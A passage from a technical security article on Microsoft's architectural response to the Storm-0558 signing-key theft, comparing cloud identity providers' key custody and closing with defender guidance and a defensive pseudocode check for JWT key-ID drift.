&lt;h3&gt;7.1 SFI: launch, expansion, motivation arc&lt;/h3&gt;
&lt;p&gt;Brad Smith launched SFI on November 2, 2023, with three pillars focused on AI-based cyber defenses, fundamental software engineering advances, and stronger international cyber norms [@sfi-launch-nov-2023]. Charlie Bell expanded it on May 3, 2024 into six pillars: protect identities and secrets; protect tenants and isolate production systems; protect networks; protect engineering systems; monitor and detect threats; accelerate response and remediation [@sfi-may-2024].&lt;/p&gt;
&lt;p&gt;Pillar 1&apos;s verbatim commitment is the one that maps onto Storm-0558 most directly: &quot;Protect identity infrastructure signing and platform keys with rapid and automatic rotation with hardware storage and protection (for example, hardware security module (HSM) and confidential compute)&quot; and &quot;Adopt more fine-grained partitioning of identity signing keys and platform keys&quot; [@sfi-may-2024].&lt;/p&gt;
&lt;p&gt;The motivation arc Smith described in his June 13, 2024 testimony connects the dots. Storm-0558 led to the November 2023 launch. The January 2024 Midnight Blizzard intrusion led to the May 2024 six-pillar expansion. The April 2024 CSRB report led to the integration of CSRB recommendations into SFI. The June 2024 hearing led to SLT compensation being tied to SFI progress [@brad-smith-2024-06-13; @sfi-may-2024].&lt;/p&gt;

A multi-year Microsoft corporate program announced November 2, 2023 by Brad Smith, expanded May 3, 2024 by Charlie Bell into six pillars, and reported on quarterly. SFI is the explicit corporate vehicle through which Microsoft commits to and reports progress on the architectural changes recommended by the CSRB after Storm-0558. Its identity-and-secrets pillar names HSM custody, automatic rotation, fine-grained key partitioning, and confidential-compute hosting of signing operations as concrete deliverables [@sfi-launch-nov-2023; @sfi-may-2024].
&lt;h3&gt;7.2 HSM-bound key custody plus automatic rotation&lt;/h3&gt;
&lt;p&gt;This closes the first two ways the pre-incident architecture failed: the software-stored key and the unrotated seven-year-old key. Microsoft&apos;s September 2024 SFI progress report&apos;s verbatim claim: &quot;We completed updates to Microsoft Entra ID and Microsoft Account (MSA) for our public and United States government clouds to generate, store, and automatically rotate access token signing keys using the Azure Managed Hardware Security Module (HSM) service&quot; [@sfi-sept-2024].&lt;/p&gt;
&lt;p&gt;Azure Managed HSM is FIPS 140-3 Level 3, built on the Marvell LiquidSecurity platform, with a multi-partition topology that allows per-tenant key isolation [@azure-managed-hsm].&lt;/p&gt;

A tamper-resistant cryptographic device that generates and stores private keys inside a hardware boundary and exposes only signing or decryption operations to its caller. Keys generated inside an HSM cannot be exported -- the device performs the signature itself, returning only the signed output. NIST FIPS 140-3 (published March 22, 2019) defines the certification regime; Level 3 adds tamper-detection and identity-based authentication requirements [@fips-140-3; @azure-managed-hsm].
&lt;p&gt;A separate Microsoft on-server primitive, Azure Integrated HSM, is explicitly framed as a Storm-0558 mitigation. Its overview page reads: &quot;Reduce network round-trips to Azure Key Vault or Managed HSM by performing cryptographic operations locally on the same node as the Virtual Machine ... Protect against memory and crash-dump attacks&quot; within &quot;a FIPS 140-3 Level 3 HSM boundary&quot; on AMD D Series v7 and AMD E Series v7 servers [@azure-integrated-hsm].&lt;/p&gt;
&lt;p&gt;The phrase &quot;memory and crash-dump attacks&quot; in the same paragraph as &quot;FIPS 140-3 Level 3&quot; is, in context, an explicit acknowledgement of the threat model Storm-0558 spent eighteen months making famous.&lt;/p&gt;
&lt;h3&gt;7.3 Signing operations inside Confidential Computing TEEs&lt;/h3&gt;
&lt;p&gt;This closes the residual that HSM custody alone leaves open: in-use observation by a privileged host operator or administrator. The HSM keeps the key from being extracted at rest. But the signing service that asks the HSM to produce a signature still runs somewhere, in some virtual machine, on a host with operators. &lt;a href=&quot;https://paragmali.com/blog/inside-azure-confidential-vms-sev-snp-intel-tdx-and-the-para/&quot; rel=&quot;noopener&quot;&gt;Confidential Computing&lt;/a&gt; closes that gap by running the signing service inside a Trusted Execution Environment whose memory and CPU state are encrypted with hardware-derived keys that not even the host operator can inspect.&lt;/p&gt;
&lt;p&gt;Microsoft&apos;s April 2025 SFI report is direct about the change: &quot;we&apos;ve applied new defense-in-depth protections in response to our Red Team research and assessments, migrated the MSA signing service to Azure confidential VMs, and are migrating Entra ID signing service to the same. Each of these improvements help mitigate the attack vectors that we suspect the actor used in the 2023 Storm-0558 attack on Microsoft&quot; [@sfi-april-2025]. The underlying TEE primitives are AMD SEV-SNP and Intel TDX, implemented in Azure&apos;s DCasv5/ECasv5 and DCesv6/ECesv6 confidential-VM SKU families [@azure-conf-compute]. The April 2025 timing was contemporaneous coverage: The Hacker News reported on the same April 21, 2025 progress post the day after [@hackernews-msa-confcompute].&lt;/p&gt;

A class of hardware-backed isolation primitives in which a virtual machine&apos;s memory and CPU state are encrypted with keys derived from the CPU itself, so that even a privileged host operator with full hypervisor access cannot read the workload&apos;s memory in cleartext. AMD&apos;s implementation is SEV-SNP (Secure Encrypted Virtualization, Secure Nested Paging); Intel&apos;s is TDX (Trust Domain Extensions). Azure exposes both through its DCasv5/ECasv5 and DCesv6/ECesv6 confidential-VM SKU families [@azure-conf-compute].
&lt;h3&gt;7.4 Tenant-issuer separation enforced in hardened validation libraries&lt;/h3&gt;
&lt;p&gt;This closes the third pre-incident failure mode: the cross-tier validation flaw. RFC 8725 Sections 3.8 and 3.9 are the canonical IETF Best Current Practice for the combined &lt;code&gt;iss&lt;/code&gt;/&lt;code&gt;aud&lt;/code&gt; mandate and have been since February 2020 (Section 3.8 covers issuer and subject; Section 3.9 covers audience) [@rfc-8725; @rfc-8725-html].&lt;/p&gt;
&lt;p&gt;The Microsoft-internal response was to consolidate JWT validation across services into a single hardened SDK that enforces the &lt;code&gt;iss&lt;/code&gt;/&lt;code&gt;aud&lt;/code&gt; check at the library level rather than leaving it to each caller. The quantified rollout numbers from successive SFI progress reports are concrete: &quot;more than 73% of tokens issued by Microsoft Entra ID for Microsoft owned applications&quot; were under hardened-SDK validation by September 2024 [@sfi-sept-2024], rising to &quot;90% of identity tokens from Microsoft Entra ID for Microsoft apps are validated by one consistent and hardened identity Software Development Kit (SDK)&quot; by April 2025 [@sfi-april-2025].&lt;/p&gt;
&lt;h3&gt;7.5 Logging as a commodity, not a premium&lt;/h3&gt;
&lt;p&gt;This closes the fourth failure mode: the paid-tier-only audit logging that delayed customer detection. The July 19, 2023 announcement made &lt;code&gt;MailItemsAccessed&lt;/code&gt; and 30+ other event classes free for FCEB and most commercial customers [@ms-blog-jul19-recovered; @cisa-statement-free-logs-fixed].&lt;/p&gt;
&lt;p&gt;The April 2025 SFI report added a further commitment: &quot;two years of internal security-log retention&quot; [@sfi-april-2025]. This addresses the secondary issue that even when logs are collected, retention windows must outlast typical adversary dwell times.&lt;/p&gt;
&lt;p&gt;The four failure modes map to four commitments. Table form makes the alignment unambiguous.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Pre-incident failure mode (Section 3)&lt;/th&gt;
&lt;th&gt;SFI commitment that closes it&lt;/th&gt;
&lt;th&gt;Source&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Software-resident, never-rotated 2016 MSA signing key&lt;/td&gt;
&lt;td&gt;Azure Managed HSM custody with automatic rotation for MSA and Entra ID (September 2024)&lt;/td&gt;
&lt;td&gt;[@sfi-sept-2024; @azure-managed-hsm]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Privileged host-side observation of in-use signing operations&lt;/td&gt;
&lt;td&gt;MSA signing service in Azure Confidential VMs (April 2025); Entra ID signing service in migration&lt;/td&gt;
&lt;td&gt;[@sfi-april-2025; @azure-conf-compute]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Cross-tier validation: OWA/Exchange Online did not enforce iss/aud&lt;/td&gt;
&lt;td&gt;Hardened identity SDK validating 90% of Entra ID tokens for Microsoft apps (April 2025)&lt;/td&gt;
&lt;td&gt;[@sfi-april-2025; @rfc-8725]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Paid-tier-only audit logging delayed customer detection&lt;/td&gt;
&lt;td&gt;Free MailItemsAccessed and 30+ event classes from September 2023; 180-day default retention; 2-year internal retention (April 2025)&lt;/td&gt;
&lt;td&gt;[@ms-blog-jul19-recovered; @cisa-statement-free-logs-fixed; @sfi-april-2025]&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Each defensive generation in Microsoft&apos;s Secure Future Initiative targets exactly one of the four ways the pre-incident MSA architecture failed. The chain is correctable, not just remediable: Microsoft can name which commitment closes which failure mode. What it still cannot name is &lt;em&gt;how&lt;/em&gt; the 2016 key itself was stolen.&lt;/p&gt;
&lt;/blockquote&gt;

flowchart TD
    A[&quot;Token request from MSA-authenticated client&quot;] --&amp;gt; B[&quot;MSA signing service in Azure Confidential VM&lt;br /&gt;(SEV-SNP or TDX)&quot;]
    B --&amp;gt; C[&quot;Attestation document from Confidential VM&quot;]
    C --&amp;gt; D[&quot;Azure Managed HSM&lt;br /&gt;(FIPS 140-3 Level 3)&quot;]
    D --&amp;gt;|&quot;sign with MSA key, rotated automatically&quot;| B
    B --&amp;gt; E[&quot;Signed token to relying party&quot;]
    E --&amp;gt; F[&quot;Hardened identity SDK validates iss, aud, kid, tenant&quot;]
    F --&amp;gt; G[&quot;Resource access granted&quot;]
&lt;p&gt;The architectural response addresses each of the four failure modes one-for-one. But how does this stack against what other major cloud providers publicly document?&lt;/p&gt;
&lt;h2&gt;8. How Other Cloud Providers Custody Signing Keys&lt;/h2&gt;
&lt;p&gt;The Storm-0558 attack class is generic. Any identity provider that signs tokens can in principle have its signing key stolen. The honest cross-provider comparison is therefore not &quot;which provider is most secure&quot; -- the public evidence does not support a defensible ranking. It is instead &quot;which architectural property each provider publicly attests to having&quot; for the keys behind its own production identity tokens.&lt;/p&gt;
&lt;p&gt;The asymmetry of the table below is itself informative. Microsoft, after Storm-0558, has the most explicit public commitments precisely because it had the most public incident.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Property&lt;/th&gt;
&lt;th&gt;Microsoft (post-SFI)&lt;/th&gt;
&lt;th&gt;AWS (IAM Identity Center, Cognito)&lt;/th&gt;
&lt;th&gt;Google (Workspace, Cloud Identity)&lt;/th&gt;
&lt;th&gt;Okta&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;HSM custody for production IdP signing keys&lt;/td&gt;
&lt;td&gt;Yes -- Azure Managed HSM, FIPS 140-3 Level 3 [@sfi-sept-2024; @azure-managed-hsm]&lt;/td&gt;
&lt;td&gt;Not publicly disclosed for IdP keys; CloudHSM is a customer primitive [@aws-cloudhsm; @aws-iam-idc-security]&lt;/td&gt;
&lt;td&gt;Not publicly disclosed for IdP keys; Cloud HSM is a customer primitive [@gcp-cloud-hsm]&lt;/td&gt;
&lt;td&gt;Not publicly disclosed at this granularity&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Confidential Compute for signing operations&lt;/td&gt;
&lt;td&gt;Yes -- MSA on Azure Confidential VMs (Apr 2025); Entra ID in migration [@sfi-april-2025; @azure-conf-compute]&lt;/td&gt;
&lt;td&gt;Nitro Enclaves available as customer primitive; not publicly disclosed for IdP keys [@aws-nitro-enclaves; @aws-nitro-whitepaper]&lt;/td&gt;
&lt;td&gt;Confidential Computing available as customer primitive; not publicly disclosed for IdP keys [@gcp-confidential-computing]&lt;/td&gt;
&lt;td&gt;Not publicly disclosed&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Automatic rotation of IdP signing keys&lt;/td&gt;
&lt;td&gt;Yes -- MSA and Entra ID automatic rotation in Azure Managed HSM [@sfi-sept-2024]&lt;/td&gt;
&lt;td&gt;AWS KMS default 365-day rotation for KMS keys; IdP rotation cadence not publicly disclosed [@aws-kms-rotation]&lt;/td&gt;
&lt;td&gt;Cloud KMS rotation customer-controllable; Google-owned-and-managed model is opaque to customers [@gcp-cloud-hsm]; Workspace SAML cert rotation is admin-driven [@gcp-workspace-saml-cert-fixed]&lt;/td&gt;
&lt;td&gt;Not publicly disclosed&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Tenant/issuer separation enforced in SDK&lt;/td&gt;
&lt;td&gt;Hardened identity SDK validating 90% of Entra ID Microsoft-app tokens (Apr 2025) [@sfi-april-2025; @rfc-8725]&lt;/td&gt;
&lt;td&gt;aws-jwt-verify library enforces iss/aud for Cognito tokens [@aws-jwt-verify; @aws-cognito-jwt]&lt;/td&gt;
&lt;td&gt;Tink library architecture supports key-set discipline [@gcp-tink]&lt;/td&gt;
&lt;td&gt;Not publicly disclosed&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Free customer audit logging&lt;/td&gt;
&lt;td&gt;MailItemsAccessed plus 30+ event classes free since Sep 2023; 2-year internal retention [@ms-blog-jul19-recovered; @sfi-april-2025]&lt;/td&gt;
&lt;td&gt;Standard CloudTrail; per-service audit varies&lt;/td&gt;
&lt;td&gt;Workspace audit log; Cloud Audit Logs&lt;/td&gt;
&lt;td&gt;System Log; baseline included&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Public IdP-signing-key-class incident disclosure&lt;/td&gt;
&lt;td&gt;Yes -- Storm-0558 (Jul 2023) and CSRB report (Apr 2024) [@csrb-report-2024]&lt;/td&gt;
&lt;td&gt;None in 2023-2026 security bulletins surveyed [@aws-security-bulletins]&lt;/td&gt;
&lt;td&gt;None in 2023-2026 security bulletins surveyed [@gcp-security-bulletins]&lt;/td&gt;
&lt;td&gt;October 2023 support-system breach; HAR-file session tokens; no IdP-signing-key compromise [@okta-rca-nov3; @okta-recommended-actions]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Customer detected before vendor notified&lt;/td&gt;
&lt;td&gt;Yes -- State Department detected Jun 15, 2023, notified Microsoft Jun 16, 2023 [@csrb-report-2024]&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;Yes -- Cloudflare detected Oct 18, 2023, contacted Okta before vendor notification [@cloudflare-okta-oct2023]&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;

The right reading of the empty cells in this table is not &quot;AWS and Google are safer than Microsoft.&quot; It is &quot;AWS and Google have not publicly disclosed an incident that would force this level of architectural commitment, so we do not know.&quot; The Wiz Research framing applies cross-provider: &quot;if a signing key for Google, Facebook, Okta or any other major identity provider leaks, the implications are hard to comprehend&quot; [@wiz-storm0558]. Absence of public disclosure is not absence of risk; it is absence of forced disclosure. Microsoft&apos;s transparency, post-CSRB, is the comparison standard not because Microsoft is uniquely vulnerable but because Microsoft has uniquely published.
&lt;p&gt;The Okta October 2023 incident is worth knowing about as a cross-vendor data point precisely because of the structural parallel. On October 18, 2023, Cloudflare detected attacker activity that traced back to Okta and contacted Okta before Okta had notified Cloudflare. BeyondTrust had notified Okta on October 2; the attacker still had access until October 18. Okta&apos;s November 3 RCA traced the root cause to a service-account credential stored in an Okta employee&apos;s personal Google account [@okta-rca-nov3; @okta-recommended-actions; @cloudflare-okta-oct2023]. Different attack class (support-system access, HAR-file session tokens, not IdP signing keys), but the same vendor-detected-by-customer detection inversion the Storm-0558 story made famous.&lt;/p&gt;
&lt;p&gt;For a CISO evaluating any IdP vendor, the four operational questions mapped to the four pre-incident failure modes in Section 3 give a structured RFP. Where is the signing key custodied, and what FIPS certification does the HSM hold? What is the rotation cadence, and is rotation automated? Does the vendor&apos;s validation SDK enforce &lt;code&gt;iss&lt;/code&gt;/&lt;code&gt;aud&lt;/code&gt; separation by default, or does it leave the check to the caller? What audit log events are available to free-tier customers, with what retention?&lt;/p&gt;
&lt;p&gt;CSA&apos;s Cloud Controls Matrix (CEK and IAM domains) and FedRAMP High SC-12 and IA-5 controls together cover most of these in standardized form, but the CAIQ answers are vendor-self-attested [@csa-ccm; @fedramp].&lt;/p&gt;
&lt;h2&gt;9. Theoretical Limits&lt;/h2&gt;
&lt;p&gt;There is one place where the architectural improvements of Section 7 stop. The Storm-0558 threat class lives downstream of a cryptographic identity, and there are limits cryptography itself imposes on what any architecture can do.&lt;/p&gt;
&lt;h3&gt;9.1 The core asymmetry&lt;/h3&gt;
&lt;p&gt;Under the standard cryptographic security notion of existential unforgeability under chosen-message attack -- &lt;strong&gt;EUF-CMA&lt;/strong&gt;, first formalized by Goldwasser, Micali, and Rivest in 1988 [@goldwasser-micali-rivest-1988] -- a signature produced by a private signing key &lt;code&gt;sk&lt;/code&gt; on a message &lt;code&gt;m&lt;/code&gt; is, to any holder of the corresponding verification key &lt;code&gt;vk&lt;/code&gt;, indistinguishable from one produced by the legitimate signer. This is not a deployment weakness. It is the &lt;em&gt;definition&lt;/em&gt; of &quot;signature.&quot; If the verifier could distinguish, the scheme would fail the security property. Formally [@goldwasser-micali-rivest-1988; @boneh-shoup-acc]:&lt;/p&gt;
&lt;p&gt;$$\text{EUF-CMA: } \forall \text{ PPT adversary } \mathcal{A}, ; \Pr[\mathcal{A}^{\text{Sign}&lt;em&gt;{sk}(\cdot)}(vk) \to (m^&lt;em&gt;, \sigma^&lt;/em&gt;) \text{ with } \text{Vrfy}&lt;/em&gt;{vk}(m^&lt;em&gt;, \sigma^&lt;/em&gt;) = 1 \land m^* \notin Q] \leq \text{negl}(\lambda)$$&lt;/p&gt;
&lt;p&gt;where $Q$ is the set of messages the adversary queried to the signing oracle. The adversary&apos;s &lt;em&gt;only&lt;/em&gt; path to forging a verifying signature on a fresh message is to learn &lt;code&gt;sk&lt;/code&gt;. Once it has &lt;code&gt;sk&lt;/code&gt;, every signature it produces is, by construction, valid.&lt;/p&gt;

EUF-CMA, *existential unforgeability under chosen-message attack*, is the standard security definition for digital signature schemes. The notion was formalized by Goldwasser, Micali, and Rivest in their 1988 *SIAM Journal on Computing* paper &quot;A Digital Signature Scheme Secure Against Adaptive Chosen-Message Attacks&quot; [@goldwasser-micali-rivest-1988]; the canonical modern openly-accessible textbook treatment is Boneh-Shoup&apos;s *A Graduate Course in Applied Cryptography*, Chapter 13, which presents the game-based definition used throughout this section [@boneh-shoup-acc]. Informally: an adversary with access to a signing oracle cannot produce a valid signature on a message it has not previously queried, except with negligible probability. The stronger sibling, sEUF-CMA (strong EUF-CMA), additionally forbids producing a new signature on a *previously-queried* message. Both notions imply that, once the private signing key is leaked, the legitimate signer can no longer be distinguished from the holder of the key by any signature-verifying party. This is what makes signing-key theft so consequential -- and is precisely the assumption that the relying-party-side `iss`/`aud` enforcement of RFC 8725 Sections 3.8 and 3.9 is designed to compensate for when validation, not cryptography, is the only remaining line of defense [@rfc-8725].
&lt;p&gt;The consequence for defenders is that all defensive advantage against signing-key-forgery attacks lives &lt;em&gt;outside&lt;/em&gt; cryptographic verification. The seven methods catalogued in Section 7 -- HSM custody, Confidential Compute, automatic rotation, tenant/issuer separation, free audit logging, customer-verifiable attestation (mostly absent at major-CSP scale), and detection by &lt;code&gt;kid&lt;/code&gt;/issuer drift -- are exhaustive over the four levers a defender has against a key whose theft is, after the fact, indistinguishable from legitimate use.&lt;/p&gt;
&lt;h3&gt;9.2 The CSP-monoculture residual&lt;/h3&gt;
&lt;p&gt;When the identity provider is a multi-tenant cloud service provider, the customer cannot independently audit the provider&apos;s key custody. The customer can demand SOC 2 attestations, ISO certifications, and CSA CAIQ answers. Each of these is vendor-self-attested. None is a per-operation cryptographic proof that the signing key the provider used to sign a given token is the one custodied as advertised.&lt;/p&gt;
&lt;p&gt;Customer-side prevention of a CSP-side custody failure is impossible by construction. Customer-side &lt;em&gt;detection&lt;/em&gt; (the methods in Section 11) is possible. The CSRB called this systemic risk out explicitly in its discussion of cloud-identity infrastructure [@csrb-report-2024].&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Customer-side prevention of a CSP-side custody failure is impossible by construction. Customer-side detection is possible. Prevention sits entirely on the CSP side. This is the asymmetry the Storm-0558 incident made visible.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;9.3 The Microsoft-as-Storm-0558-victim recursion&lt;/h3&gt;
&lt;p&gt;There is a recursive aspect to Microsoft&apos;s position that is worth naming honestly. Microsoft sells controls -- HSM custody, Confidential Compute, hardened SDKs, audit logging -- intended to defend against the attack class Microsoft itself was the highest-profile victim of. Brad Smith&apos;s &quot;without equivocation&quot; framing acknowledged the recursion implicitly. The CSRB&apos;s framing was harsher: a corporate culture that &quot;deprioritized enterprise security investments and rigorous risk management&quot; was, in the Board&apos;s view, what allowed the recursion to obtain [@csrb-report-2024; @dhs-csrb-report-release].&lt;/p&gt;
&lt;h3&gt;9.4 The upper bound&lt;/h3&gt;
&lt;p&gt;The aggregate of HSM custody, Confidential Computing, automatic rotation, and tenant/issuer separation raises the attacker&apos;s required compromise from &quot;find a key in a debugging artifact&quot; to &quot;simultaneously compromise the Confidential VM build pipeline, do so within the rotation window, and bypass the HSM access control or extract a per-key signing oracle.&quot; Each is individually possible. Jointly they are several orders of magnitude harder than the pre-Storm-0558 baseline. This is not a theoretical proof of security; it is empirical defense in depth.&lt;/p&gt;

Imagine the cleanest possible customer-side defense. The customer subscribes only to providers that publish FIPS 140-3 Level 3 certifications, audit reports, and CAIQ answers. The customer pins acceptable issuers in their relying-party validators. The customer monitors for `kid` drift in tokens. Each of these reduces the *detection* latency for a CSP-side compromise. None of them reduces the *probability* that the CSP&apos;s signing key gets stolen tomorrow. Probability reduction at the source sits entirely on the CSP side, because the signing key by construction lives there.
&lt;p&gt;Defense in depth defeats &lt;em&gt;plausible&lt;/em&gt; paths. Whether it defeats the &lt;em&gt;actual&lt;/em&gt; path is unknown -- because, three years on, the actual path is still unknown.&lt;/p&gt;
&lt;h2&gt;10. Open Problems&lt;/h2&gt;
&lt;p&gt;Six open problems remain after three years, in descending order of architectural consequence.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;OP1 -- The mechanism gap.&lt;/strong&gt; Microsoft still does not publicly know how the 2016 MSA signing key was stolen. The methods of Section 7 defeat &lt;em&gt;plausible&lt;/em&gt; paths, but the actual path is undocumented. Until the actual mechanism is recovered (if it ever is), Microsoft is in the position of having raised the bar against the categories of attack it suspects, without being able to confirm that the bar it raised is the one the attacker cleared [@csrb-report-2024; @msrc-key-acquisition].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;OP2 -- The broader-blast-radius question.&lt;/strong&gt; Wiz Research showed the same key could in principle have signed tokens for SharePoint, Teams, OneDrive, and many third-party &quot;Sign in with Microsoft&quot; applications. Whether the broader scope was exploited and went undetected against telemetry that never existed is unanswered [@wiz-storm0558].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;OP3 -- CSP regulation as critical infrastructure.&lt;/strong&gt; The CSRB report framed cloud-identity-provider regulation as an open U.S. policy question. The Board recommended treating identity infrastructure as critical infrastructure subject to mandatory disclosure and minimum security baselines. Implementation across Congress, the executive branch, and sector-specific regulators is incomplete [@csrb-report-2024].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;OP4 -- Cross-provider unrotated-signing-key risk.&lt;/strong&gt; No major non-Microsoft IdP publicly discloses signing-key rotation cadence for its production tokens. Microsoft&apos;s transparency post-CSRB is, at present, the publication standard; AWS&apos;s, Google&apos;s, and Okta&apos;s positions are inferred from product documentation rather than disclosed in the form Microsoft now uses [@aws-iam-idc-security; @gcp-cloud-hsm].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;OP5 -- Threshold or multi-party signing for production IdP signing keys.&lt;/strong&gt; Practical cryptographic protocols exist. The canonical Schnorr-class construction is FROST -- &quot;Flexible Round-Optimized Schnorr Threshold Signatures&quot; -- introduced by Chelsea Komlo and Ian Goldberg at SAC 2020 [@frost-springer-sac-2020] and standardized as IRTF/CFRG RFC 9591 in June 2024 (a two-round protocol with five normative ciphersuites covering Ed25519, ristretto255, Ed448, P-256, and secp256k1) [@rfc-9591-frost].&lt;/p&gt;
&lt;p&gt;For ECDSA, Yehuda Lindell and Ariel Nof&apos;s CCS 2018 paper described what its abstract called &quot;the first truly practical full threshold ECDSA signing protocol that has both fast signing and fast key distribution&quot; [@lindell-nof-cris]. The DKLs line (Doerner, Kondi, Lee, shelat) extended the work, with the May 2023 update &quot;Threshold ECDSA in Three Rounds&quot; the current standard reference, accompanied by named third-party production implementations from Coinbase, Silence Laboratories, Taurus Group, and BlockDaemon [@dkls-info].&lt;/p&gt;
&lt;p&gt;No major cloud service provider has publicly deployed threshold signing for production IdP keys at the scale where compromise of a single signing oracle still ends the conversation. This is the largest unrealized research-to-practice gap in the entire stack.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;OP6 -- Customer-verifiable attestation of IdP key custody.&lt;/strong&gt; No standardized cryptographic primitive analogous to Certificate Transparency exists for IdP signing-key state. The design pattern was specified by Ben Laurie, Adam Langley, and Emilia Kasper (all of Google) in RFC 6962 in June 2013 -- a Merkle-tree-backed append-only log of TLS certificate issuance that lets any customer cryptographically detect that a certificate authority issued a certificate for their domain that they did not request [@rfc-6962-ct]. There is no equivalent primitive that lets a customer cryptographically detect that a token issuer signed a token naming them as &lt;code&gt;sub&lt;/code&gt; that they (or their identity provider) did not request. This is the architectural ceiling of customer-side defense.&lt;/p&gt;
&lt;p&gt;OP5 and OP6 both have rich primary-source literatures the article only gestures at. For OP5, follow the original FROST paper [@frost-springer-sac-2020] for the security proof reducing to discrete log via the Bellare-Neven Generalized Forking Lemma, the corresponding IRTF specification [@rfc-9591-frost] for the deployable ciphersuites, Lindell-Nof&apos;s CCS 2018 paper [@lindell-nof-cris] for the threshold-ECDSA foundation, and the DKLs project page [@dkls-info] for the most recent three-round construction. For OP6, RFC 6962 [@rfc-6962-ct] specifies the Merkle-tree-backed append-only log structure (the Signed Certificate Timestamp, the Merkle Audit Path, and the Merkle Consistency Proof) that any future IdP-key-custody-transparency protocol would build on.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; OP1, OP5, and OP6 are research-grade open questions in cryptographic systems design. OP2, OP3, and OP4 are policy and disclosure questions, addressable through regulation or industry-coordinated transparency norms. None has a published, deployed answer.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Three research-grade gaps, three policy-grade gaps. The defender, meanwhile, has to ship something on Monday. What should that something be?&lt;/p&gt;
&lt;h2&gt;11. What a Defender Should Do Today&lt;/h2&gt;
&lt;p&gt;The practical guidance splits along three audiences: M365 customers operating the consumer side of this incident&apos;s geometry, builders of multi-tenant SaaS that signs JWTs of their own, and CISOs evaluating cloud identity vendors.&lt;/p&gt;
&lt;h3&gt;11.1 For Microsoft 365 customers&lt;/h3&gt;
&lt;p&gt;First, confirm Purview Audit is enabled at the highest tier your SKU permits, that &lt;code&gt;MailItemsAccessed&lt;/code&gt; is being collected, and that the events are being forwarded to a SIEM with retention of at least 180 days. The features previously gated on Premium have been free for FCEB and most commercial customers since the September 2023 rollout [@ms-blog-jul19-recovered; @cisa-statement-free-logs-fixed].&lt;/p&gt;
&lt;p&gt;Second, maintain an inventory of legitimate &lt;code&gt;(AppID, ClientAppID)&lt;/code&gt; pairs that historically read mailboxes in your tenant, and alert on any deviation. The State Department detection is reproducible only if you have collected the events to detect &lt;em&gt;with&lt;/em&gt;.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; 1. Purview Audit at the highest tier your SKU permits, with &lt;code&gt;MailItemsAccessed&lt;/code&gt; collection enabled. 2. SIEM forwarding with at least 180 days of retention (Microsoft&apos;s new default), preferably longer. 3. A maintained baseline of legitimate &lt;code&gt;(AppID, ClientAppID)&lt;/code&gt; pairs for mailbox access. 4. Alerts on cross-issuer use (an enterprise resource accessed by a token from a consumer or unexpected &lt;code&gt;iss&lt;/code&gt;). 5. Routine threat-hunting against &lt;code&gt;MailItemsAccessed&lt;/code&gt; events filtered by anomalous source IPs, working-hours patterns, and bulk-fetch behavior consistent with exfiltration [@aa23-193a].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;A baseline-deviation rule, expressed compactly:&lt;/p&gt;
&lt;p&gt;{`
// Pseudocode. Run against ingested JWT validation events from your SIEM.
// &apos;observedKids&apos; is the set of kid values your relying parties have processed.
// &apos;currentJwksKids&apos; is fetched live from the issuer&apos;s JWKS endpoint.&lt;/p&gt;
&lt;p&gt;async function checkKidDrift(issuer, observedKids) {
  const jwks = await fetch(issuer + &apos;/.well-known/openid-configuration&apos;)
    .then(r =&amp;gt; r.json())
    .then(cfg =&amp;gt; fetch(cfg.jwks_uri))
    .then(r =&amp;gt; r.json());&lt;/p&gt;
&lt;p&gt;  const currentKids = new Set(jwks.keys.map(k =&amp;gt; k.kid));&lt;/p&gt;
&lt;p&gt;  for (const kid of observedKids) {
    if (!currentKids.has(kid)) {
      alert({
        severity: &apos;medium&apos;,
        reason: &apos;kid not in current issuer JWKS&apos;,
        issuer,
        kid,
        note: &apos;Either an expired/retired key being replayed, or a forged token signed by a kid the issuer no longer publishes. Both warrant investigation.&apos;
      });
    }
  }
}
`}&lt;/p&gt;
&lt;h3&gt;11.2 For builders of multi-tenant SaaS that signs JWTs&lt;/h3&gt;
&lt;p&gt;If you sign JWTs yourself, you are operating an identity provider, and the Storm-0558 lessons apply to you directly. The checklist is six items.&lt;/p&gt;
&lt;ol&gt;
